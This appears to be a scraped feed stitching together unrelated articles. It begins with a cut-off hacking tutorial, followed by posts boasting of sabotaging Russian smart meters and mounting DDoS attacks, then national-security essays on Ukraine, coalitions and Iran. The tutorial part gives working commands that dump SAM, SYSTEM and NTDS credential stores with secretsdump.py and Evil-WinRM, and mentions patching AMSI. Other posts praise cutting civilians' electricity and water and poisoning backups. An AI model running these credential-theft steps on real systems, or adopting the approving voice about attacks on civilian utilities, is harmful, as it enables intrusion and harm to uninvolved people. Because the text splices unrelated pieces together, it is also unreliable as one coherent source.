listing sam and system hive dumps

Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.

Next we need to exfiltrate these files and extract the credentials:

kali > secretsdump.py -sam SAM -system SYSTEM LOCAL
extracting creds from sam hive

Attacking NTDS on Domain Controllers

If you’ve already compromised a domain admin or managed to escalate your privileges on the Domain Controller, you might want to grab the credentials of every user in the company.

We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. You can load scripts into Evil-WinRM straight from your machine so they execute on the target without ever touching disk. It can also patch AMSI, but be really careful with that.

Connect to the DC:

kali > evil-winrm -i DC -u admin -p password -s ‘/home/user/scripts/’

Now you can execute your scripts:

PS > ntds.ps1
dumping NTDS with ntds.ps1 script

Evil-WinRM has a download command to save them. Then run this command:

kali > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL
extracting creds from the ntds dump

Summary

PowerShell can also be used for privilege escalation and complete domain compromise. We showed you a few steps where each builds on the previous one. Hackers can chain these small misconfigurations to take over an organization. 

Want to become a Powershell expert? Join our Powershell for Hackers training.

The post PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover first appeared on Hackers Arise.

Ukraine Is No Longer the Country Russia Thought It Was

Understanding a country's strategic culture helps assess how it will react to crisis, negotiation, and national security events. Strategic culture generally is static and when it evolves, it happens slowly, as history, events, and culture accumulate over generations. In 2021, the prevailing view of Ukraine’s strategic culture was that it was a country focused on securing its national identity and sovereignty apart from Russia and it was a country prone to rely on negotiations and diplomacy. The balance between these two themes was about even with Ukraine leaning toward diplomacy and multilaterism over sovereignty when pushed by the international community. Most students of strategic culture did not assess that Ukraine would react to a Russian invasion with the military force that it has. Now students of strategic culture see the theme of independence and sovereignty as the key aspect of Ukraine’s strategic culture with a growing theme of being modern day military experts. The rapid transformation of the assessment of Ukrainian strategic culture is astounding. Either strategic culture academics got Ukraine wrong, or the Russian invasion changed Ukraine cataclysmically. I suspect it is a bit of both.

Strategic Culture

Strategic culture refers to a nation's shared beliefs, assumptions, and habitual behaviors regarding the use of force and the pursuit of security objectives. Jack L. Snyder introduced the term in 1977, arguing that a state's behavior cannot be explained by material capabilities or geography alone, but by those factors combined with history, cultural norms, and shared societal beliefs. Strategic culture is generally resistant to change. While it is often invoked to explain Russia's decision to invade Ukraine — its relevance to Ukraine's response has been comparatively overlooked.

Ukraine's Early Strategic Culture

Ukraine's strategic culture has been shaped by centuries of foreign domination and by its Soviet legacy. Early studies of strategic culture in independent Ukraine identified securing a national identity separate from Russia as the paramount objective. Those same early studies concluded that Ukraine favored diplomatic engagement, multilateral cooperation, and alliance-building over military action — pointing to Ukraine's surrender of its nuclear arsenal after the Soviet collapse and its acquiescence to Russia's 2014 seizure of Crimea as evidence. But this reading likely mistook constraint for preference. Ukraine was a newly independent state with a fledgling security establishment and military; it lacked the structure and capacity to stand up to either the United States or Russia, both of which pressed it toward disarmament and restraint. And, while significant events, neither of those two events were an immediate threat to Ukrainian independence. What looked like a cultural preference for negotiation may have been the best available option available for a young, under-resourced state. This misreading of Ukrainian resolve and strategic culture set Russia up for a catastrophic miscalculation that has cost over a million lives and will take decades for both countries to recover from.

The first principle of Ukraine’s strategic culture — safeguarding a distinct national identity — endures today. But the second focus on diplomacy and multinationalism-- has changed. If successful, the Russian invasion would have meant that this first principle would have to be abrogated and Ukrainian identity would once again have been subsumed by Moscow. Ukraine could not tolerate that: fighting for independence and Ukrainian identity outweighs alliance-building and negotiations as the organizing goal of its strategic culture. Today, Kyiv increasingly foot stomps aspects of Ukrainian identity that were suppressed under Soviet rule, and its foreign policy has grown more assertive, favoring offensive posture over purely defensive behavior. What has emerged is a culture that balances patience for international negotiation with adaptability and a hardened determination not to be conquered again, at any cost.

Two Defining Characteristics

Two characteristics of Ukrainian strategic culture stand out as key to explaining Ukrainian resistance to Russia:

Ukraine's growing emphasis on its Cossack heritage appears designed to construct a new state myth and reshape national self-perception from one of victimhood to one of warrior. Invoking the Cossacks — a self-governing, democratic, and militarily capable community prone to raids and revolt — underscores both Ukraine's independence and its capacity for military action. Domestically, images of the great hetmans now appear more prominently on currency and in textbooks.

Ukrainian strategic culture rests on the primacy of sovereignty, independence, and territorial integrity — values Russia has threatened or dismissed both historically and in the present. Language has become a central tool of this identity claim: early post-independence legislation established the primacy of Ukrainian language to rebuild a cohesive national identity, and that legislative push accelerated around the outbreak of armed conflict in 2014, alongside a marked cooling toward proposals to formalize Russian as a second official language. For Ukrainians, language is intrinsic to national identity. I recall being tutored in Ukrainian by an émigré in the late 1980s; he was a tough teacher, and he would grow angry whenever I mistakenly lapsed into Russian even though it was our common language and at times the only language in which we could communicate.

Ukrainian Strategic Culture Today

Ukraine's strategic culture now manifests as an asymmetrical, creative approach to security — one that offsets comparatively limited military resources with international partnerships, novel approaches to warfare, and disciplined strategic messaging. It emphasizes flexibility, resilience, gray-zone tactics, and pragmatic decision-making. Increasingly, we are seeing Ukraine promoting its tactics and military resources internationally.

Ukraine's strategic norms are still evolving, but the trajectory since independence is clear: independence and ingenuity have become the paramount, defining components of Ukrainian strategic culture, expressed through firm state priorities. A lasting orientation toward the West, paired with renewed emphasis on Slavic and Cossack roots, matters too, if somewhat less centrally. Above all, a study of modern day Ukrainian strategic culture tells us that Ukraine will do what it must to preserve its hard-won independence — while still maintaining its position as a respected leader within the global community.

Recently, the new Ukrainian Minister of Defense, Yevhenii Khmara, said

”Ukraine has always seen tragedy. Its history is a long inventory of it. What separates this generation from all the ones before is that it has a real chance to defeat the enemy.”

This tells you a lot about the mindset of senior Ukrainian decision makers and how they are messaging their people and the international community.

Why it Matters

Understanding Ukrainian strategic culture helps us to determine what approach to take to help end the war in Ukraine. Paramount for the country is ensuring Ukraine’s sovereignty and independence. For Ukraine, that is nonnegotiable. Any negotiating concepts that leave room for other nations to impose themselves on Ukrainian decision making is a nonstarter for Kyiv. Recognizing Ukraine’s sacrifices not only in the last four years but the tragic historical road they have been on with pre Soviet Russia and the Soviets will go far in any negotiations. Finally, acknowledging and highlighting how well Ukraine has out played Russia would also go a long way. Next, I will present Russian strategic culture and then discuss where the two clash.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

SCADA Hacking and Security – Compromising IoT Systems

Welcome back, cyberwarriors!

We continue our series on SCADA system compromise with another breach that recently happened. A while back, another Russian organization was compromised by Cyber Cossacks, a hacker unit in Ukraine.

The team was trained by OccupyTheWeb to defend Ukraine digitally, and every so often they check back in and share what they’ve managed to pull off.

Introduction

The compromised company was established in the early 2000s and mainly worked on designing and implementing integrated solutions for automation and monitoring. For years they directly supported the Russian state by doing business in Crimea.

The same company produced hardware and software for these IoT devices. They were making smart meters, data loggers, PLCs, industrial routers and protocol converters. These products were installed across a wide range of sectors in Russia.

Initial Access and Infection

The company was compromised through a phishing attack, with the payload embedded in an email attachment. Security products can fail to keep up with newer custom RATs that get constantly updated to dodge standard detection methods.

IoT System Monitoring and Interference

Over the course of several days, the group analyzed the target environment’s internal network. They maintained access for approximately six months, monitoring activity and altering certain datasets. They didn’t simply wipe the systems, which would have caused only a temporary impact, the group made changes over an extended period to gradually corrupt the collected data.

This would make the backups poisoned as well. That insured that any system restoration would basically rely on compromised figures.

The group also found images from different locations, which helped them understand the configuration and physical deployment of the hardware.

Here is an example of their systems. The thick cable carries all the data back and forth, while the smaller wires tap into each meter’s output and send it into the controller. Behind the scenes it analyzes those signals and makes sure everything stays within safe limits.

They also shared several types of control cabinets. More sophisticated control panels had compact PLCs with a series of I/O modules snapped onto DIN rails. This setup basically functions as a small industrial control center. The PLC receives data from sensors, makes logical decisions and then triggers specific outputs. All managed in this cabinet.

Impact on Private Consumers

Beyond interfering with commercial systems, the group extended their efforts to installations intended for private consumers. These were smart meters responsible for monitoring water and electricity usage. 

In response to ongoing Russian attacks on Ukrainian energy infrastructure, the group selectively disabled electricity to certain users.

They also interfered with water meters and cut off access to water where it was possible.

These installations were all centrally connected to the main server through antenna links mounted on rooftops and that’s how the hackers could receive telemetry from them.

Impact

Above you can see a part of the redacted list of affected companies in different regions of Russia, mainly in Moscow. Each item in the list represented a node within the system. Changes were made to various parameters. As mentioned earlier, the most strategic part of the attack was poisoning the backups. When the IT department tried to recover from these backups, the restoration brought back corrupted values.

By late June 2025, the company data and the primary systems responsible for processing and managing the connected nodes were destroyed. In total, that affected approximately 3,500 meter installations across Russia.

Conclusion

A good understanding of IoT and industrial control systems with good strategic planning can produce a widespread impact. Instead of just destroying systems, the group sabotaged the entire mechanism of restoration and continuity.

If you want to know how to hack and secure SCADA and IoT systems, we invite you to our training led by OccupyTheWeb.

The post SCADA Hacking and Security – Compromising IoT Systems first appeared on Hackers Arise.

The CyberWarrior Handbook, Part 01

Welcome back, my cyberwarriors!

In this series, we will detail how an individual or small group of cyberwarriors can impact global geopolitics. The knowledge and tools that YOU hold are a superpower that can change history.

Use it wisely.

To begin this discussion, let’s look at the actions of a small group of hackers at the outset of the Russian invasion of Ukraine. We will detail these actions up to the present, attempting to demonstrate that even a single individual or small group can influence global outcomes in our connected digital world. Cyber war is real and even a single individual can have an impact on global political outcomes.

Let’s begin in February 2022, nearly 3 years ago. At that time, Ukraine was struggling to throw off the yoke of Russian domination. As a former member state of the Soviet Union (the successor to the Romanov’s Russian Empire), they declared their independence, like so many former Soviet republics (such as Estonia, Latvia, Lithuania, Georgia, Armenia, Kazakhstan, and others) from that failed and brutal alliance in 1991 (this is the moment that the Soviet Union disintegrated). This union failed primarily due to the inability of the Soviet Union to address the needs of their citizens. Simple things like food, clean water, and consumer goods. And, of course, the tyranny.

Russia, having lost absolute control of these nations, attempted to maintain influence and control by bending their leaders to Putin’s will. In Ukraine, this meant a string of leaders who answered to Putin, rather than the Ukrainian people. In addition, Russian state-sponsored hackers such as Sandworm, attacked Ukraine’s digital infrastructure repeatedly to create chaos and confusion within the populace. This included the famous BlackEnergy3 attack in 2014 against the Ukrainian power transmission system that blacked out large segments of Ukraine in the depths of winter (for more on this and other Russian cyberattacks against Ukraine, read this article).

In February 2022, the US and Western intelligence agencies warned of an imminent attack from Russia on Ukraine. In an unprecedented move, the US president and the intelligence community revealed, (based upon satellite and human intelligence-) that Russia was about to invade Ukraine. The new Ukrainian president, Volodymyr Zelenskyy, publicly denied and tried to minimize the probability that an attack was about to take place. Zelenskyy had been a popular comedian and actor in Ukraine (there is a Netflix comedy made by Zelenskyy before he became president named “Servant of the People”) and was elected president in a landslide election as the people of Ukraine attempted to clean Russian domination from their politics and become part of the free Europe. Zelenskyy may have denied the likelihood of a Russian attack to bolster the public mood in Ukraine and not anger the Russian leader (Ukraine and Russia have long family ties on both sides of the border) .

We at Hackers-Arise took these warnings to heart and started to prepare.

List of Targets in Russia
List of Targets in Russia

First, we enumerated the key websites and IP addresses of critical and essential Russian military and commercial interests. There was no time to do extensive vulnerability research on each of those sites with the attack imminent, so instead, we readied one of the largest DDoS attacks in history! The goal was to disable the Russians’ ability to use their websites and digital communications to further their war ends and cripple their economy. This is exactly the same tactic that Russia had used in previous cyber wars against their former republics, Georgia and Estonia. In fact, at the same time, Russian hackers had compromised the ViaSat satellite internet service and were about to send Ukraine and parts of Europe into Internet darkness (read about this attack here).

We put out the word to hackers around the world to prepare. Tens of thousands of hackers prepared to protect Ukraine’s sovereignty. Eventually, when Russian troops crossed the border into Ukraine on February 24, 2022, we were ready. At this point in time, Ukraine created the IT Army of Ukraine and requested assistance from hackers across the world, including Hackers-Arise.

Within minutes, we launched the largest DDoS attack the Russians had ever seen, over 760GB/sec (as documented later by the Russian telecom provider, Rostelcom). This was twice the size of any DDoS attack in Russian history (https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/) This attack was a coordinated DDoS attack against approximately 50 sites in Russia such as the Department of Defense, the Moscow Stock Exchange, Gazprom, and other key commercial and military interests.

As a result of this attack, Russian military and commercial interests were hamstrung. Websites were unreachable and communication was hampered. After the fact, Russian government leaders estimated that 17,000 IP addresses had participated and they vowed to exact revenge on all 17,000 of us (we estimated the actual number was closer to 100,000).

This massive DDoS attack, unlike any Russia had ever seen and totally unexpected by Russian leaders, hampered the coordination of military efforts and brought parts of the Russian economy to its knees. The Moscow Stock Exchange shut down and the largest bank, Sberbank, closed. This attack continued for about 6 weeks and effectively sent the message to the Russian leaders that the global hacker/cyberwarrior community opposed their aggression and was willing to do something about it. This was a
first in the history of the world!

The attack was simple in the context of DDoS attacks. Most DDoS attacks in our modern era involve layer 7 resources to make sites unavailable, but this one was simply an attack to clog the pipelines in Russia with “garbage” traffic. It worked. It worked largely because Russia was arrogant and unprepared without adequate DDoS protection from the likes of Cloudflare or Radware.

Within days, we began a new campaign to target the Russian oligarchs, the greatest beneficiaries of Putin’s kleptocracy (you can read more about it here). These oligarchs are complicit in robbing the Russian people of their resources and income for their benefit. They are the linchpin that keeps the murderer, Putin, in power. In this campaign, initiated by Hackers-Arise, we sought to harass the oligarchs in their yachts throughout the world (the oligarchs escape Russia whenever they can). We sought to first (1) identify their yachts, then (2) locate their yachts, and finally (3) send concerned citizens to block their fueling and re-supply. In very short order, this campaign evolved into a program to capture these same super yachts and hold them until the war was over, eventually to sell and raise funds to rebuild Ukraine. We successfully identified, located, and seized the top 9 oligarch yachts (worth billions of USD), including Putin’s personal yacht (this was the most difficult). All of them were seized by NATO forces and are still being held.

In the next few posts here we will detail;

  1. The request from the Ukraine Army to hack IP cameras in Ukraine for surveillance and our success in doing so;

  2. The attacks against Russian industrial systems resulted in damaging fires and other malfunctions.

    Look for Master OTW’s book, “A Cyberwarrior Handbook”, coming in 2026.

The post The CyberWarrior Handbook, Part 01 first appeared on Hackers Arise.

Fighter jets help destroy Russian drone boat near European offshore gas platform

This week, Romania accused Russia of sending a drone boat loaded with explosives to a vital European natural gas platform in the Black Sea. A Romanian F-16 fighter jet used its cannons to disable the surface drone so that explosive ordnance experts could blow it up safely.

On August 20, the Romanian Coast Guard first spotted the maritime drone a few hundred meters away from the Neptun Deep project’s main drilling platform, where several hundred workers were busy with the platform’s ongoing installation, Defense Minister Radu Miruță said in a Facebook post. The offshore gas project would make Romania the largest gas producer in the European Union once it starts full production in 2027.

To protect the lives of the workers and the offshore gas infrastructure, the Romanian military scrambled two F-16 fighter jets to stop the drone with cannon fire, Miruță said. Army specialists later carried out a controlled detonation, as seen in a Facebook video shared by the defense minister.

Read full article

Comments

© Romanian Ministry of Defense

Beyond Military Interoperability: The Coalition Challenge of Limited War

In our last two articles for The Cipher Brief, Sami Omari and I explained why modern limited wars are so challenging for democracies.

We argued that military superiority is necessary but not sufficient for strategic victory: Afghanistan and Iraq showed that battlefield success does not guarantee lasting political outcomes, and Iran may yet prove the same point.

We also examined why democracies struggle to translate tactical success into strategic achievement: fragmented institutions, electoral cycles, public opinion and media scrutiny complicate the political resolve required for prolonged wars of choice.

The challenge becomes greater when democracies fight as coalitions.

Alliances combine military power, share costs and draw on capabilities few states could sustain independently.

But military integration does not produce political unity.

Each member remains accountable to its own electorate, parliament and national interests. A coalition may therefore be highly integrated on the battlefield while remaining politically and strategically decentralised.

In prolonged limited wars, military interoperability is not enough if allies cannot sustain the political will, industrial capacity and common strategic purpose required to endure.

II. Why Democracies Fight in Coalitions

The nuclear age made direct great-power war prohibitively dangerous, shifting competition towards limited wars, insurgencies and proxy conflicts.

Western militaries increasingly moved towards smaller professional forces equipped with more advanced weapons, shaped by technological progress and new strategic realities.

After 1991, the Gulf War and subsequent operations against weaker adversaries appeared to vindicate the effectiveness of Western expeditionary forces.

But smaller professional militaries and increasingly expensive weapons also made allies progressively dependent upon one another. Coalitions allowed democracies to aggregate military power, intelligence, logistics and specialised capabilities without each maintaining the forces and industrial capacity required for large-scale national mobilisation.

For thirty years, that system seemed to work.

Russia’s war against Ukraine has exposed these vulnerabilities over several years; the US-Israeli war with Iran is now testing many of the same assumptions.

Both demonstrate that limited wars can become contests of manpower, industrial capacity and political will.

Of these pressures, political endurance is perhaps the most difficult for democracies to sustain.

III. The Political Endurance Problem

For democracies, fighting a long, limited war depends as much on political legitimacy at home as on military capability.

In wars of choice, where national survival is not at stake, governments must continually justify why the costs of war remain necessary.

Initial public support may create space for intervention, but it erodes as casualties rise, costs accumulate, and the prospect of a clear strategic outcome grows uncertain.

Casualties alone do not determine support.

Democratic societies have accepted heavy losses when citizens believed a war was legitimate, necessary and winnable.

The deeper problem emerges when the link between sacrifice and strategic purpose becomes unclear. As confidence in success fades, losses that once seemed tolerable turn politically damaging. Elections, parliamentary opposition, media scrutiny and changes of government then allow declining public confidence to reshape national strategy. Afghanistan illustrated this over two decades.

Western military superiority was never in doubt, but political will steadily weakened. The longer the war continued without a convincing political end state, the harder it became for democratic leaders to explain what more time, money and lives would achieve.

Authoritarian states face similar pressures but, without competitive elections and independent media, can better insulate strategic decisions from public opinion.

Against democratic opponents, this creates a critical asymmetry: a weaker adversary may not need to win militarily, only survive long enough for democratic political will to erode.

IV. The Industrial Endurance Problem

Political endurance is only one side of the problem. The other is material.

Since the Cold War, Western militaries have increasingly relied on technology instead of mass.

Smaller professional forces employ sophisticated aircraft, ships, missiles and networked systems aimed at achieving decisive results while minimising casualties. But each generation of weapons is more expensive and complex, production runs shrink, and replacing battlefield losses becomes harder as war drags on.

The United States can absorb these pressures better than smaller allies because of its defence budget, technological base and industrial scale.

Even so, American forces became smaller, while defence-industry consolidation reduced the number of manufacturers capable of producing specialised weapons. For smaller allies, limited budgets forced difficult choices between personnel, platforms and munitions, while dependence on American weapons, software, supply chains and sustainment deepened.

Quick wars against weaker opponents long obscured these problems.

Ukraine has brought them sharply to the surface, while the Iran conflict is testing them anew. Advanced weapons can be consumed faster than peacetime factories replace them, while cheap drones and missiles allow weaker states to impose continuing costs on advanced rivals.

This creates an uncomfortable paradox.

Military interoperability strengthens coalitions on the battlefield but also creates industrial dependencies that are difficult to escape. In long, limited wars, technological superiority matters only as long as the coalition can afford, produce and replace what it consumes.

V. A Coalition of Decentralised Systems

Coalitions do not solve the political endurance problem; if anything, they make it worse.

Integrating militaries does not erase national sovereignty. Allied forces can share command structures, intelligence and interoperable systems, but each government still answers to its own voters, parliament and interests.

Afghanistan made that painfully obvious. NATO operated under one mission on paper, but contributing states imposed their own caveats and restrictions on where and how their troops could operate.

Those caveats were not bureaucratic quirks; they reflected different domestic political pressures and appetites for risk. They made burden-sharing and coalition cohesion harder than the unified-command narrative suggested.

Of the contemporary great powers, the US above all can supply the backbone of an international military coalition: intelligence, logistics and advanced capabilities.

What it cannot do is fuse the sovereign political systems behind every other contributor.

Middle and smaller powers like Australia and Canada still matter because they bring niche capabilities, diplomatic weight and political legitimacy while operating inside their own domestic constraints.

Coalitions may fight as one integrated military network, but the statecraft holding that network together stays stubbornly decentralised.

VI. From Military Interoperability to Strategic Interoperability

This gap between integrated military networks and decentralised statecraft is the central weakness of contemporary coalition warfare.

Modern limited wars therefore require more than military interoperability. They require strategic interoperability.

Sovereign allies must be able to coordinate military, political, economic and industrial power to pursue and sustain a common strategic objective.

This does not mean supranational government or surrendered sovereignty, but unity of strategic effect even when national policies differ.

In practice, this could involve standing allied mechanisms that integrate political planning, defence production, economic measures, strategic communications and military operations around an agreed political end state before a crisis becomes a prolonged war.

Conclusion

Across these three articles, we have argued that military superiority alone cannot guarantee strategic victory; that democratic institutions often struggle to turn battlefield success into sustainable political outcomes; and that these difficulties multiply when democracies fight as coalitions.

The endurance of democratic alliances will depend on more than their ability to fight together.

Sovereign governments must sustain public support, share political and military burdens, and remain committed to common strategic purpose when conflicts become longer and more costly than expected.

Democratic accountability need not become a strategic weakness, but preserving sovereignty while sustaining collective action will require greater political cohesion.

The ultimate obstacle is not technology or concepts, but political will: overcoming domestic divisions and institutional rivalries to sustain common purpose.

As the era of AI unfolds, technology will keep changing warfare, but it cannot repair the organisational weaknesses of those who use it.

Strategic interoperability ultimately depends on whether democracies can find the will to build it.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

Open-Source Intel Makes U.S. Troops an Easier Target for Iran

Iran is reading American service members’ social media feeds to deadly effect. The fact is that not all intelligence must be gleaned from secret, closed sources for it to be effective, and Tehran has made use of public and open-source data to target U.S. forces with psychological and kinetic attacks. Until the Pentagon updates and enforces its policies on social media posting and personal device security, American servicemembers will be sitting ducks.

Admiral Brad Cooper, the commander of CENTCOM, warned in a letter last month to U.S. forces that Iran is using social media posts from personnel, such as footage of U.S. bases, to improve its lethality. For example, a video of soldiers running for shelter during Iranian strikes helped Iran perform a battle damage assessment of their strikes, including their precision, and understand base layout for future attacks.

Iran has long exploited open-source data to target U.S. forces and allies. Two years ago, Iran doxxed 2,200 Israel Defense Forces personnel relying exclusively on open-source data. In April 2026, the Department of the Navy warned service members that unnamed cyber adversaries (obviously referring to Iran) are reaching out on social media and conducting phishing attacks, urging sailors to turn on privacy settings and refrain from posting on social media. The same month, Iranian hacker group Handala sent threatening WhatsApp messages to U.S. troops and published the supposed personal information of 2,300 U.S. service members stationed in the Persian Gulf.

Open-source data is broader than just Instagram and Facebook. Iran exploits data breaches to collect information and identify and send text messages to former Israeli defense personnel to threaten them and to attempt to recruit them for espionage purposes.

Iran is exploiting Signaling System 7 (SS7), an older telecom protocol for roaming, to identify devices with U.S. SIM cards, according to threat intelligence platform Mobile Surveillance Monitor. Using SS7, Iran was reportedly able to pinpoint hotels that housed U.S. personnel and contractors.

Iran can also simply buy data for its malicious campaigns. CENTCOM stated in a letter to Sen. Ron Wyden (D-OR) that it has been warned that Iran may have used commercially available location data used by digital advertisers to “target and surveil” U.S. personnel. While the phone numbers behind advertising IDs are anonymized, Iran could use them to track devices in specific areas such as military bases. The Pentagon conceded that these IDs are not yet disabled by default on government-issued phones.

None of these vulnerabilities should be a surprise to defense officials. A U.S. Government Accountability Office report from October 2025 found that social media posts from service members and their families or friends provide adversaries with names, ranks, and locations that can be pieced together to reveal information about U.S. force formations and operations. Wyden and his Democratic and Republican colleagues in the House and Senate sent a letter to the Pentagon’s chief information officer in May 2026 urging more secure personal data practices and blaming current vulnerabilities on the department’s “failure to prioritize this threat and implement common sense cyber defenses recommended by federal cybersecurity experts.” The House version of the annual defense bill, meanwhile, calls for the department to better understand and train personnel about how adversaries can exploit commercial technologies to identify and monitor U.S. personnel.

To curb adversarial intelligence collection opportunities, the Department of Defense (DoD) should expand operational security requirements across the force.

First, the DoD should harden government and personal devices by requiring removal of all Mobile Advertising IDs (MAIDs) on personal and DoD-distributed devices for personnel in sensitive areas. Without IDs, the locations and metadata cannot be tracked or associated with individual users and sold to adversaries posing as commercial buyers.

Next, the DoD should create and enforce stringent policies for social media posting. Personnel should be prohibited from uploading unofficial photos and videos of military facilities or that otherwise relate to their roles and should limit the amount of information they post about their roles on platforms like LinkedIn. Government devices should have their cameras disabled or removed unless required for specific purposes, and GPS should be disabled by default. DoD should also consider providing troops with alternative devices for personal use with GPS disabled and the cameras removed.

Additionally, the DoD should monitor breached data to understand what is publicly available about all its personnel. Knowing when data is exposed will allow the DoD to identify potential threats before Iran acts and begin fixing the issue as soon as it occurs. The department can also use this information to enable mandatory password and credential rotation when information is exposed. The Pentagon should also consider encouraging or requiring additional methods of authentication, such as passkeys and biometrics, for all devices and accounts

Finally, Congress should pass regulatory reforms to transition from SS7 to new signaling technology. SS7 is an outdated system and cannot guarantee secure communications, even if new updates were to be completed. Changing the system will allow service members abroad to communicate with loved ones without leading adversaries to their location.

These measures will limit the open-source data that, at present, is readily available to Iran and other adversaries. If the DoD continues to permit unrestricted use of personal devices abroad, Iran and other adversaries will continue exploiting their vulnerabilities to locate, study, and threaten American forces.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

Inside Iran’s New Wartime Leadership



Tehran’s new power brokers

A wave of assassinations rebuilt Iran’s leadership from the top down, leaving a severely wounded supreme leader and a security establishment now calling the shots. Tehran, however, isn’t saying who is actually in charge. The silence is part of the narrative; who are the country’s power players?

Earlier this month, Iranian state media did something it had never done before.

Mehr News, an outlet controlled by the country’s Islamic Development Organization, released a video titled “First Images of the Leader,” showing Supreme Leader Mojtaba Khamenei addressing a small group of students. The footage was undated. It came, however, days after Israeli outlets reported the 56-year-old cleric was in “extremely critical condition,” and it appears to have done little to settle the question consuming Iran’s political class: is anyone actually running the country right now.

The clip echoed a similar undated video IRIB released in March, showing Khamenei teaching religious sciences. President Masoud Pezeshkian acknowledged this week that reaching him has been “very difficult,” though he described their last exchange as constructive.

Multiple sources close to Pezeshkian’s administration told IranWire that no cabinet minister has met with Khamenei since the February 28 strike that killed his father, Ali Khamenei, and that officials “would not be surprised” to hear news of his death.

Iranian authorities have repeatedly denied he’s incapacitated. But the man now holding life-tenure authority over Iran’s armed forces, judiciary and clerical establishment hasn’t spoken publicly, delivered a sermon, or appeared unedited on camera since taking the post in March.

“The main issue for U.S. policymakers — especially any president — is whether the new leadership in Iran, or any leadership we can currently anticipate, is likely to depart materially from the strategic policies of the previous leadership,” Norman Roule, a former CIA officer who spent 34 years managing programs related to Iran and the Middle East, tells The Cipher Brief. “The evidence to date suggests no fundamental break.”

The vacuum at the top didn’t stay empty for long.

A Leadership Rebuilt Through Killings

The cascade began on February 28, when a joint U.S.-Israeli strike killed longstanding leader Ali Khamenei along with Mohammad Pakpour, the Islamic Revolutionary Guard Corps’ commander-in-chief, and a string of other senior officials. An interim leadership council, made up of Pezeshkian, judiciary chief Gholamhossein Mohseni-Ejei and cleric Alireza Arafi, held the state together for less than a week before the Assembly of Experts named Mojtaba Khamenei as Iran’s third Supreme Leader on March 8.

The choice was unusual on its face. The Islamic Republic was founded on the overthrow of hereditary monarchy, yet its clerical establishment had just installed the son of the man he replaced. Mojtaba lacked the religious credentials typically required of a Supreme Leader. He was widely regarded as a hojatoleslam, a mid-ranking cleric, rather than an ayatollah — yet he had spent nearly two decades as his father’s gatekeeper and enjoyed deep loyalty inside the Revolutionary Guard.

President Trump, who had labeled him “unacceptable” during the war, later told Fox News that the succession was not one his own father had wanted, adding, “their leadership is gone, their second leadership is gone, now their third leadership is in trouble.”

Roule, however, cautions against reading the new bench as a break from what came before it. Most of Iran’s current leaders, he notes, “rose within institutions shaped by Ali Khamenei and were trusted, promoted, or shaped within, and by the system he developed over years of rule.”

Roule points to the generational math: Pezeshkian, Mohsen Rezaee and Ali Reza Zolghadr were about 25 years old at the time of the 1979 revolution; Ahmad Vahidi was 21; Mohammad Bagher Ghalibaf and Sadeq Amoli Larijani around 18; Mojtaba Khamenei just 10.

“For this group, the 1979 Revolution remained the ideological foundation of the system, but the Iran-Iraq War and the post-2003 campaign for regional influence were more important professional experiences,” Roule explains. “Most are veterans of the Iran-Iraq War or were directly shaped by it.”

The current command of the Islamic Revolutionary Guard Corps has followed the same brutal pattern.

Amir Ali Hajizadeh, head of the Guard’s aerospace force, was killed in a strike in June 2025. Pakpour, who had succeeded Hajizadeh’s predecessor Hossein Salami, was killed at the outset of the U.S.-Israeli campaign in February. His successor, Ahmad Vahidi, a Quds Force founder and former interior minister with an Interpol red notice tied to the 1994 AMIA bombing in Buenos Aires, was formally installed as commander-in-chief on March 1.

Unverified reports of Vahidi’s own death circulated in Tehran in late May and again in early June; Iranian, Israeli or American officials have confirmed none, and Vahidi continues to be listed as the IRGC’s active chief.

A Crackdown That Fits the Moment

The uncertainty at the top has coincided with a sharp rise in executions and threatened executions, months after the January protests that shook the regime.

Austin Sarat, a professor of jurisprudence and political science, says the war and the unrest have compounded each other rather than one driving the other alone.

“The protests and the war have fueled — it’s like putting a little bit of an accelerant into something that’s already pretty flammable,” Sarat tells The Cipher Brief. “The protests were, I think, much more trigger than the war itself. The war has just provided yet another excuse, because it’s jacked up nationalist fervor.”

Sarat is skeptical that outside pressure, including past White House rhetoric threatening consequences over executions, has had much bearing on Tehran’s calculus.

“The administration has said nothing about human rights abuses, let alone execution practices around the world,” he says, underscoring that any outside leverage is more likely to come from Europe than Washington. He views the surge itself as a familiar survival tactic for a leadership still finding its footing.

“It’s not a kind of unfamiliar tactic for a regime new to power to want to flex its muscle and terrorize the population,” he observes. “This is a survival moment, and they are going to do what they are going to do to preserve the essential character of their regime.”

The Guard Consolidates Around the Vacuum

With the younger Khamenei largely unseen, the Revolutionary Guard didn’t sit on its hands. It moved fast, filling top posts through official decrees.

Along with Vahidi, the Supreme Leader’s office named Mostafa Izadi as deputy IRGC commander, Ali Azmaei to head the IRGC Navy and Hossein Taeb to lead the Basij paramilitary force, filling six senior military posts vacated by wartime deaths.

Mohsen Rezaee, who commanded the IRGC from 1981 to 1997, was separately appointed as the Supreme Leader’s representative on the Supreme National Security Council. This post opened up, according to Rose Kelanic, director of the Middle East Program at Defense Priorities, after Zolghadr was pushed out.

Kelanic argues the reshuffle amounts to more than a personnel change.

“Mojtaba Khamenei’s role appears to be that of a figurehead and potential scapegoat, enjoying far less authority than his father, whom he replaced,” Kelanic tells The Cipher Brief. “The real power rests with Ghalibaf, Vahidi and Rezaee, who are all career IRGC officers, which functionally means that Iranian government authority has shifted even further from civilian control to military control.”

That shift, she continues, carries its own risk for any settlement with Washington.

